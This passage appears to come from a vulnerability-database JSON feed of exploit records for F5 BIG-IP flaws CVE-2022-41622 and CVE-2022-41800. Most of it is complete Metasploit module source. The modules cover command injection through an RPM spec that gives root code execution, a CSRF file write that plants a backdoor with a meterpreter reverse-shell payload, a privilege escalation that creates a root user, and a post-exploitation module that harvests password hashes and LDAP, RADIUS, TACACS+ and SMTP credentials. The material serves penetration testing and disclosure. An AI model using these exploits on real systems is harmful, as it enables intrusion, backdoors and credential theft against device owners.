the RPM file after \nname = rand_text_alphanumeric(5..10) \nversion = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\" \nrelease = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\" \n \nvprint_status('Creating an .rpmspec file on the target...') \nresult = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'data' => { \n'specFileData' => { \n'name' => name, \n'srcBasePath' => '/tmp', \n'version' => version, \n'release' => release, \n# This is the injection - add newlines then a '%check' section \n'description' => \"\\n\\n%check\\n#{payload.encoded}\\n\", \n'summary' => rand_text_alphanumeric(5..10) \n} \n}.to_json \n}) \n \nfail_with(Failure::Unknown, 'Failed to send HTTP request') unless result \nfail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 \nfail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code != 200 \n \njson = result&.get_json_document \nfail_with(Failure::UnexpectedReply, \"Server didn't return valid JSON\") unless json \n \nfile_path = json['specFilePath'] \nfail_with(Failure::UnexpectedReply, \"Server didn't return a specFilePath\") unless file_path \nvprint_status(\"Created spec file: #{file_path}\") \nregister_file_for_cleanup(file_path) \n \n# We can also use `exit 1` in the %check function to prevent this file \n# from being created, rather than cleaning it up.. but that seems noisier? \n# Neither option gets logged so /shrug \nregister_file_for_cleanup(\"/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm\") \n \nvprint_status('Building the RPM to trigger the payload...') \nresult = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'), \n'ctype' => 'application/json', \n'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']), \n'data' => { \n'state' => {}, \n'appName' => rand_text_alphanumeric(5..10), \n'packageDirectory' => '/tmp', \n'specFilePath' => file_path \n}.to_json \n}) \nfail_with(Failure::Unknown, 'Failed to send HTTP request') unless result \nfail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401 \nfail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code < 200 || result.code > 299 \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/170008/f5_icontrol_rpmspec_rce_cve_2022_41800.rb.txt"}, {"lastseen": "2022-11-21T16:28:37", "description": "", "cvss3": {}, "published": "2022-11-21T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP iControl Cross Site Request Forgery", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-21T00:00:00", "id": "PACKETSTORM:169967", "href": "https://packetstormsecurity.com/files/169967/F5-BIG-IP-iControl-Cross-Site-Request-Forgery.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpServer::HTML \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API', \n'Description' => %q{ \nThis module exploits a cross-site request forgery (CSRF) vulnerability \nin F5 Big-IP's iControl interface to write an arbitrary file to the \nfilesystem. \n \nWhile any file can be written to any location as root, the \nexploitability is limited by SELinux; the vast majority of writable \nlocations are unavailable. By default, we write to a script that \nexecutes at reboot, which means the payload will execute the next time \nthe server boots. \n \nAn alternate target - Login - will add a backdoor that executes next \ntime a user logs in interactively. This overwrites a file, \nbut we restore it when we get a session \n \nNote that because this is a CSRF vulnerability, it starts a web \nserver, but an authenticated administrator must visit the site, which \nredirects them to the target. \n}, \n'Author' => [ \n'Ron Bowes' # Discovery, PoC, and module \n], \n'References' => [ \n['CVE', '2022-41622'], \n['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'], \n['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'], \n['URL', 'https://support.f5.com/csp/article/K97843387'], \n['URL', 'https://support.f5.com/csp/article/K94221585'], \n['URL', 'https://support.f5.com/csp/article/K05403841'], \n], \n'License' => MSF_LICENSE, \n'DisclosureDate' => '2022-11-16', # Vendor advisory \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD], \n'Type' => :unix_cmd, \n'Privileged' => true, \n'Targets' => [ \n[ 'Restart', {}, ], \n[ 'Login', {}, ], \n[ 'Custom', {}, ] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, \n'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp' \n}, \n'Notes' => { \n'Stability' => [CRASH_SAFE], \n'Reliability' => [REPEATABLE_SESSION], \n'SideEffects' => [ \nIOC_IN_LOGS, \nARTIFACTS_ON_DISK \n] \n} \n) \n) \n \nregister_options( \n[ \nOptString.new('TARGET_HOST', [true, 'The IP or domain name of the target F5 device']), \nOptString.new('TARGET_URI', [true, 'The URI of the SOAP API', '/iControl/iControlPortal.cgi']), \nOptBool.new('TARGET_SSL', [true, 'Use SSL for the upstream connection?', true]), \nOptString.new('FILENAME', [false, 'The file on the target to overwrite (for \"custom\" target) - note that SELinux prevents overwriting a great deal of useful files']), \n] \n) \nend \n \ndef on_request_uri(socket, _request) \nif datastore['TARGET'] == 0 # restart \nfilename = '/shared/f5_update_action' \nfile_payload = <<~EOT \nUpdateAction \nhttps://localhost/success`#{payload.encoded}` \nhttps://localhost/error \n0 \n0 \n0 \n0 \nEOT \n \n# Delete the logfile if we get a session \nregister_file_for_cleanup('/var/log/f5_update_checker.out') \n \nprint_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come approximately 2 minutes after the target is rebooted\") \nelsif datastore['TARGET'] == 1 # login \nfilename = '/var/run/config/timeout.sh' \nfile_payload = \"#{payload.encoded} & disown;\" \n \n# Delete the backdoored file if we get a session.. this will be fixed at \n# next reboot \nregister_file_for_cleanup('/var/run/config/timeout.sh') \n \nprint_status(\"Redirecting the admin to overwrite #{filename}; if successful, your session will come the next time a user logs in interactively\") \nelse # Custom \n \nfilename = datastore['FILENAME'] \nfile_payload = payload.encoded \n \nprint_status(\"Redirecting the admin to overwrite #{filename} with the payload\") \nend \n \n# Build the SOAP request that'll be sent to the target server \ncsrf_payload = %( \n<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:con=\"urn:iControl:System/ConfigSync\"> \n<soapenv:Header/> \n<soapenv:Body> \n<con:upload_file soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"> \n<file_name xsi:type=\"xsd:string\">#{filename}</file_name> \n<file_context xsi:type=\"urn:System.ConfigSync.FileTransferContext\" xmlns:urn=\"urn:iControl\"> \n<!--type: Common.OctetSequence--> \n<file_data xsi:type=\"urn:Common.OctetSequence\">#{Rex::Text.encode_base64(file_payload)}</file_data> \n<chain_type xsi:type=\"urn:Common.FileChainType\">FILE_FIRST_AND_LAST</chain_type> \n</file_context> \n</con:upload_file> \n</soapenv:Body> \n</soapenv:Envelope> \n) \n \n# Build the target URL \ntarget_url = \"#{datastore['TARGET_SSL'] ? 'https' : 'http'}://#{datastore['TARGET_HOST']}#{datastore['TARGET_URI']}\" \n \n# Build the HTML payload that'll send the SOAP request via the user's browser \nhtml_payload = %( \n<html> \n<body> \n<form action=\"#{target_url}\" method=\"POST\" enctype=\"text/plain\"> \n<textarea id=\"payload\" name=\"<!--\">-->#{Rex::Text.html_encode(csrf_payload)}</textarea> \n</form> \n<script> \ndocument.forms[0].submit(); \n</script> \n</body> \n</html> \n) \n \n# Send the HTML to the browser \nsend_response(socket, html_payload, { 'Content-Type' => 'text/html' }) \nend \n \ndef exploit \n# Sanity check \nif datastore['TARGET'] == 2 && (!datastore['FILENAME'] || datastore['FILENAME'].empty?) \nfail_with(Failure::BadConfig, 'For custom targets, please provide the FILENAME') \nend \n \nprint_good('Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below') \nsuper \nend \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/169967/f5_icontrol_soap_csrf_rce_cve_2022_41622.rb.txt"}], "metasploit": [{"lastseen": "2023-02-03T20:50:40", "description": "This creates a local user with a username/password and root-level privileges. Note that a root-level account is not required to do this, which makes it a privilege escalation issue. Note that this is pretty noisy, since it creates a user account and creates log files and such. Additionally, most (if not all) vulnerabilities in F5 grant root access anyways. Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n", "cvss3": {}, "published": "2022-11-16T20:12:16", "type": "metasploit", "title": "F5 Big-IP Create Admin User", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2023-02-01T19:02:04", "id": "MSF:EXPLOIT-LINUX-LOCAL-F5_CREATE_USER-", "href": "https://www.rapid7.com/db/modules/exploit/linux/local/f5_create_user/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'unix_crypt'\n\nclass MetasploitModule < Msf::Exploit::Local\n include Msf::Post::Linux::F5Mcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Create Admin User',\n 'Description' => %q{\n This creates a local user with a username/password and root-level\n privileges. Note that a root-level account is not required to do this,\n which makes it a privilege escalation issue.\n\n Note that this is pretty noisy, since it creates a user account and\n creates log files and such. Additionally, most (if not all)\n vulnerabilities in F5 grant root access anyways.\n\n Adapted from https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-privesc.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => [ 'unix', 'linux', 'python' ],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2022-11-16',\n 'Arch' => [ ARCH_CMD, ARCH_PYTHON ],\n 'Type' => :unix_cmd,\n 'Targets' => [[ 'Auto', {} ]],\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options([\n OptString.new('USERNAME', [true, 'Username to create (default: random)', Rex::Text.rand_text_alphanumeric(8)]),\n OptString.new('PASSWORD', [true, 'Password for the new user (default: random)', Rex::Text.rand_text_alphanumeric(12)]),\n\n OptBool.new('CREATE_SESSION', [true, 'If set, use the new account to create a root session', true]),\n ])\n end\n\n def exploit\n # Get or generate the username/password\n fail_with(Failure::BadConfig, 'USERNAME cannot be empty') if datastore['USERNAME'].empty?\n username = datastore['USERNAME']\n\n if datastore['CREATE_SESSION']\n password = Rex::Text.rand_text_alphanumeric(12)\n new_password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}, then change password to #{new_password} when creating a session\")\n else\n password = datastore['PASSWORD'] || Rex::Text.rand_text_alphanumeric(12)\n\n print_status(\"Will attempt to create user #{username} / #{password}\")\n end\n\n # If the password is already hashed, leave it as-is\n vprint_status('Hashing the password with SHA512')\n hashed_password = UnixCrypt::SHA512.build(password)\n\n if !hashed_password || hashed_password.empty?\n fail_with(Failure::BadConfig, 'Failed to hash the password with String.crypt')\n end\n\n # These requests have to go in a single 'session', which, to us, is\n # a single packet (since we don't have AF_UNIX sockets)\n result = mcp_send_recv([\n # Authenticate as 'admin' (this probably shouldn't work but does)\n mcp_build('user_authenticated', 'structure', [\n mcp_build('user_authenticated_name', 'string', 'admin')\n ]),\n\n # Start transaction\n mcp_build('start_transaction', 'structure', [\n mcp_build('start_transaction_load_type', 'ulong', 0)\n ]),\n\n # Create the role mapping\n mcp_build('create', 'structure', [\n mcp_build('user_role_partition', 'structure', [\n mcp_build('user_role_partition_user', 'string', username),\n mcp_build('user_role_partition_role', 'ulong', 0),\n mcp_build('user_role_partition_partition', 'string', '[All]'),\n ])\n ]),\n\n # Create the userdb entry\n mcp_build('create', 'structure', [\n mcp_build('userdb_entry', 'structure', [\n mcp_build('userdb_entry_name', 'string', username),\n mcp_build('userdb_entry_partition_id', 'string', 'Common'),\n mcp_build('userdb_entry_is_system', 'ulong', 0),\n mcp_build('userdb_entry_shell', 'string', '/bin/bash'),\n mcp_build('userdb_entry_is_crypted', 'ulong', 1),\n mcp_build('userdb_entry_passwd', 'string', hashed_password),\n ])\n ]),\n\n # Finish the transaction\n mcp_build('end_transaction', 'structure', [])\n ])\n\n # Handle errors\n if result.nil?\n fail_with(Failure::Unknown, 'Request to mcp appeared to fail')\n end\n\n # The only result we really care about is an error\n error_returned = false\n result.each do |r|\n result = mcp_get_single(r, 'result')\n result_code = mcp_get_single(result, 'result_code')\n\n # If there's no code or it's zero, just ignore it\n if result_code.nil? || result_code == 0\n next\n end\n\n # If we're here, an error was returned!\n error_returned = true\n\n # Otherwise, try and get result_message\n result_message = mcp_get_single(result, 'result_message')\n if result_message.nil?\n print_warning(\"mcp query returned a non-zero result (#{result_code}), but no error message\")\n else\n print_error(\"mcp query returned an error message: #{result_message} (code: #{result_code})\")\n end\n end\n\n # Let them know if it likely worked\n if !error_returned\n print_good(\"Service didn't return an error, so user was likely created!\")\n\n if datastore['CREATE_SESSION']\n print_status('Attempting create a root session...')\n\n out = cmd_exec(\"echo -ne \\\"#{password}\\\\n#{password}\\\\n#{new_password}\\\\n#{new_password}\\\\n#{payload.encoded}\\\\n\\\" | su #{username}\")\n\n vprint_status(\"Output from su command: #{out}\")\n end\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/local/f5_create_user.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-12-13T22:48:58", "description": "This module gathers various interesting pieces of data from F5's \"mcp\" datastore, which is accessed via /var/run/mcp using a proprietary protocol. Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb\n", "cvss3": {}, "published": "2022-11-23T19:10:34", "type": "metasploit", "title": "F5 Big-IP Gather Information from MCP Datastore", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-30T16:59:10", "id": "MSF:POST-LINUX-GATHER-F5_LOOT_MCP-", "href": "https://www.rapid7.com/db/modules/post/linux/gather/f5_loot_mcp/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Post\n include Msf::Post::File\n include Msf::Post::Linux::System\n include Msf::Post::Linux::F5Mcp\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 Big-IP Gather Information from MCP Datastore',\n 'Description' => %q{\n This module gathers various interesting pieces of data from F5's\n \"mcp\" datastore, which is accessed via /var/run/mcp using a\n proprietary protocol.\n\n Adapted from: https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-getloot.rb\n },\n 'License' => MSF_LICENSE,\n 'Author' => ['Ron Bowes'],\n 'Platform' => ['linux', 'unix'],\n 'SessionTypes' => ['shell', 'meterpreter'],\n 'References' => [\n ['URL', 'https://github.com/rbowes-r7/refreshing-mcp-tool'], # Original PoC\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ],\n 'DisclosureDate' => '2022-11-16',\n 'Notes' => {\n 'Stability' => [],\n 'Reliability' => [],\n 'SideEffects' => []\n }\n )\n )\n\n register_options(\n [\n OptBool.new('GATHER_HASHES', [true, 'Gather password hashes from MCP', true]),\n OptBool.new('GATHER_SERVICE_PASSWORDS', [true, 'Gather upstream passwords (ie, LDAP, AD, RADIUS, etc) from MCP', true]),\n OptBool.new('GATHER_DB_VARIABLES', [true, 'Gather database variables (warning: slow)', false]),\n ]\n )\n end\n\n def gather_hashes\n print_status('Gathering users and password hashes from MCP')\n users = mcp_simple_query('userdb_entry')\n\n unless users\n print_error('Failed to query users')\n return\n end\n\n users.each do |u|\n print_good(\"#{u['userdb_entry_name']}:#{u['userdb_entry_passwd']}\")\n\n create_credential(\n jtr_format: Metasploit::Framework::Hashes.identify_hash(u['userdb_entry_passwd']),\n origin_type: :session,\n post_reference_name: refname,\n private_type: :nonreplayable_hash,\n private_data: u['userdb_entry_passwd'],\n session_id: session_db_id,\n username: u['userdb_entry_name'],\n workspace_id: myworkspace_id\n )\n end\n end\n\n def gather_upstream_passwords\n print_status('Gathering upstream passwords from MCP')\n\n vprint_status('Trying to fetch LDAP / Active Directory configuration')\n ldap_config = mcp_simple_query('auth_ldap_config') || []\n ldap_config.select! { |config| config['auth_ldap_config_bind_pw'] }\n if ldap_config.empty?\n print_status('No LDAP / Active Directory password found')\n else\n ldap_config.each do |config|\n config['auth_ldap_config_servers'].each do |server|\n report_cred(\n username: config['auth_ldap_config_bind_dn'],\n password: config['auth_ldap_config_bind_pw'],\n host: server,\n port: config['auth_ldap_config_port'],\n service_name: (config['auth_ldap_config_ssl'] == 1 ? 'ldaps' : 'ldap')\n )\n end\n end\n end\n\n vprint_status('Trying to fetch Radius configuration')\n radius_config = mcp_simple_query('radius_server') || []\n radius_config.select! { |config| config['radius_server_secret'] }\n if radius_config.empty?\n print_status('No Radius password found')\n else\n radius_config.each do |config|\n report_cred(\n password: config['radius_server_secret'],\n host: config['radius_server_server'],\n port: config['radius_server_port'],\n service_name: 'radius'\n )\n end\n end\n\n vprint_status('Trying to fetch TACACS+ configuration')\n tacacs_config = mcp_simple_query('auth_tacacs_config') || []\n tacacs_config.select! { |config| config['auth_tacacs_config_secret'] }\n if tacacs_config.empty?\n print_status('No TACACS+ password found')\n else\n tacacs_config.each do |config|\n config['auth_tacacs_config_servers'].each do |server|\n report_cred(\n password: config['auth_tacacs_config_secret'],\n host: server,\n port: 49,\n service_name: 'tacacs+'\n )\n end\n end\n end\n\n vprint_status('Trying to fetch SMTP configuration')\n smtp_config = mcp_simple_query('smtp_config') || []\n smtp_config.select! { |config| config['smtp_config_username'] }\n if smtp_config.empty?\n print_status('No SMTP password found')\n else\n smtp_config.each do |config|\n report_cred(\n username: config['smtp_config_username'],\n password: config['smtp_config_password'],\n host: config['smtp_config_smtp_server_address'],\n port: config['smtp_config_smtp_server_port'],\n service_name: 'smtp'\n )\n end\n end\n end\n\n def gather_db_variables\n print_status('Fetching db variables from MCP (this takes a bit)...')\n vars = mcp_simple_query('db_variable')\n\n unless vars\n print_error('Failed to query db variables')\n return\n end\n\n vars.each do |v|\n print_good \"#{v['db_variable_name']} => #{v['db_variable_value']}\"\n end\n end\n\n def resolve_host(hostname)\n ip = nil\n if session.type == 'meterpreter' && session.commands.include?(Rex::Post::Meterpreter::Extensions::Stdapi::COMMAND_ID_STDAPI_NET_RESOLVE_HOST)\n result = session.net.resolve.resolve_host(hostname)\n ip = result[:ip] if result\n else\n result = cmd_exec(\"dig +short '#{hostname}'\")\n ip = result.strip unless result.blank?\n end\n\n vprint_warning(\"Failed to resolve hostname: #{hostname}\") unless ip\n\n ip\n rescue Rex::Post::Meterpreter::RequestError => e\n elog(\"Failed to resolve hostname: #{hostname.inspect}\", error: e)\n end\n\n def report_cred(opts)\n netloc = \"#{opts[:host]}:#{opts[:port]}\"\n print_good(\"#{netloc.ljust(21)} - #{opts[:service_name]}: '#{opts[:username]}:#{opts[:password]}'\")\n\n if opts[:host] && !Rex::Socket.is_ip_addr?(opts[:host])\n opts[:host] = resolve_host(opts[:host])\n end\n\n service_data = {\n address: opts[:host],\n port: opts[:port],\n service_name: opts[:service_name],\n protocol: opts.fetch(:protocol, 'tcp'),\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n post_reference_name: refname,\n session_id: session_db_id,\n origin_type: :session,\n private_data: opts[:password],\n private_type: :password,\n username: opts[:username]\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n status: Metasploit::Model::Login::Status::UNTRIED\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n def run\n gather_hashes if datastore['GATHER_HASHES']\n gather_upstream_passwords if datastore['GATHER_SERVICE_PASSWORDS']\n gather_db_variables if datastore['GATHER_DB_VARIABLES']\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/post/linux/gather/f5_loot_mcp.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-03-18T06:53:02", "description": "This module exploits a newline injection into an RPM .rpmspec file that permits authenticated users to remotely execute commands. Successful exploitation results in remote code execution as the root user.\n", "cvss3": {}, "published": "2022-11-16T20:04:18", "type": "metasploit", "title": "F5 BIG-IP iControl Authenticated RCE via RPM Creator", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-23T18:42:07", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_RPMSPEC_RCE_CVE_2022_41800-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl Authenticated RCE via RPM Creator',\n 'Description' => %q{\n This module exploits a newline injection into an RPM .rpmspec file\n that permits authenticated users to remotely execute commands.\n\n Successful exploitation results in remote code execution\n as the root user.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41800'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K13325942'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Privileged' => true,\n 'Targets' => [\n [ 'Default', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true, # Needed to avoid warnings about timeouts and potential failures across attempts.\n 'MeterpreterTryToFork' => true # Needed to avoid warnings about timeouts and potential failures across attempts.\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION], # One at a time\n 'SideEffects' => [\n IOC_IN_LOGS,\n ARTIFACTS_ON_DISK\n ]\n }\n )\n )\n\n register_options(\n [\n OptString.new('HttpUsername', [true, 'iControl username', 'admin']),\n OptString.new('HttpPassword', [true, 'iControl password', ''])\n ]\n )\n end\n\n def exploit\n # The RPM name is based on these, so we need these to delete the RPM file after\n name = rand_text_alphanumeric(5..10)\n version = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\"\n release = \"#{rand_text_numeric(1)}.#{rand_text_numeric(1)}.#{rand_text_numeric(1)}\"\n\n vprint_status('Creating an .rpmspec file on the target...')\n result = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/rpm-spec-creator'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'data' => {\n 'specFileData' => {\n 'name' => name,\n 'srcBasePath' => '/tmp',\n 'version' => version,\n 'release' => release,\n # This is the injection - add newlines then a '%check' section\n 'description' => \"\\n\\n%check\\n#{payload.encoded}\\n\",\n 'summary' => rand_text_alphanumeric(5..10)\n }\n }.to_json\n })\n\n fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result\n fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401\n fail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code != 200\n\n json = result&.get_json_document\n fail_with(Failure::UnexpectedReply, \"Server didn't return valid JSON\") unless json\n\n file_path = json['specFilePath']\n fail_with(Failure::UnexpectedReply, \"Server didn't return a specFilePath\") unless file_path\n vprint_status(\"Created spec file: #{file_path}\")\n register_file_for_cleanup(file_path)\n\n # We can also use `exit 1` in the %check function to prevent this file\n # from being created, rather than cleaning it up.. but that seems noisier?\n # Neither option gets logged so /shrug\n register_file_for_cleanup(\"/var/config/rest/node/tmp/RPMS/noarch/#{name}-#{version}-#{release}.noarch.rpm\")\n\n vprint_status('Building the RPM to trigger the payload...')\n result = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/mgmt/shared/iapp/build-package'),\n 'ctype' => 'application/json',\n 'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword']),\n 'data' => {\n 'state' => {},\n 'appName' => rand_text_alphanumeric(5..10),\n 'packageDirectory' => '/tmp',\n 'specFilePath' => file_path\n }.to_json\n })\n fail_with(Failure::Unknown, 'Failed to send HTTP request') unless result\n fail_with(Failure::NoAccess, 'Authentication failed') if result.code == 401\n fail_with(Failure::UnexpectedReply, \"Server returned an unexpected response: HTTP/#{result.code}\") if result.code < 200 || result.code > 299\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-19T22:45:30", "description": "This module exploits a cross-site request forgery (CSRF) vulnerability in F5 Big-IP's iControl interface to write an arbitrary file to the filesystem. While any file can be written to any location as root, the exploitability is limited by SELinux; the vast majority of writable locations are unavailable. By default, we write to a script that executes at reboot, which means the payload will execute the next time the server boots. An alternate target - Login - will add a backdoor that executes next time a user logs in interactively. This overwrites a file, but we restore it when we get a session Note that because this is a CSRF vulnerability, it starts a web server, but an authenticated administrator must visit the site, which redirects them to the target.\n", "cvss3": {}, "published": "2022-11-16T19:58:15", "type": "metasploit", "title": "F5 BIG-IP iControl CSRF File Write SOAP API", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-41622", "CVE-2022-41800"], "modified": "2022-11-18T22:18:25", "id": "MSF:EXPLOIT-LINUX-HTTP-F5_ICONTROL_SOAP_CSRF_RCE_CVE_2022_41622-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'F5 BIG-IP iControl CSRF File Write SOAP API',\n 'Description' => %q{\n This module exploits a cross-site request forgery (CSRF) vulnerability\n in F5 Big-IP's iControl interface to write an arbitrary file to the\n filesystem.\n\n While any file can be written to any location as root, the\n exploitability is limited by SELinux; the vast majority of writable\n locations are unavailable. By default, we write to a script that\n executes at reboot, which means the payload will execute the next time\n the server boots.\n\n An alternate target - Login - will add a backdoor that executes next\n time a user logs in interactively. This overwrites a file,\n but we restore it when we get a session\n\n Note that because this is a CSRF vulnerability, it starts a web\n server, but an authenticated administrator must visit the site, which\n redirects them to the target.\n },\n 'Author' => [\n 'Ron Bowes' # Discovery, PoC, and module\n ],\n 'References' => [\n ['CVE', '2022-41622'],\n ['URL', 'https://github.com/rbowes-r7/refreshing-soap-exploit'],\n ['URL', 'https://www.rapid7.com/blog/post/2022/11/16/cve-2022-41622-and-cve-2022-41800-fixed-f5-big-ip-and-icontrol-rest-vulnerabilities-and-exposures/'],\n ['URL', 'https://support.f5.com/csp/article/K97843387'],\n ['URL', 'https://support.f5.com/csp/article/K94221585'],\n ['URL', 'https://support.f5.com/csp/article/K05403841'],\n ],\n 'License' => MSF_LICENSE,\n 'DisclosureDate' => '2022-11-16', # Vendor advisory\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD],\n 'Type' => :unix_cmd,\n 'Privileged' => true,\n 'Targets' => [\n [ 'Restart', {}, ],\n [ 'Login', {}, ],\n [ 'Custom', {}, ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'Payload' => 'cmd/unix/python/meterpreter/reverse_tcp'\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 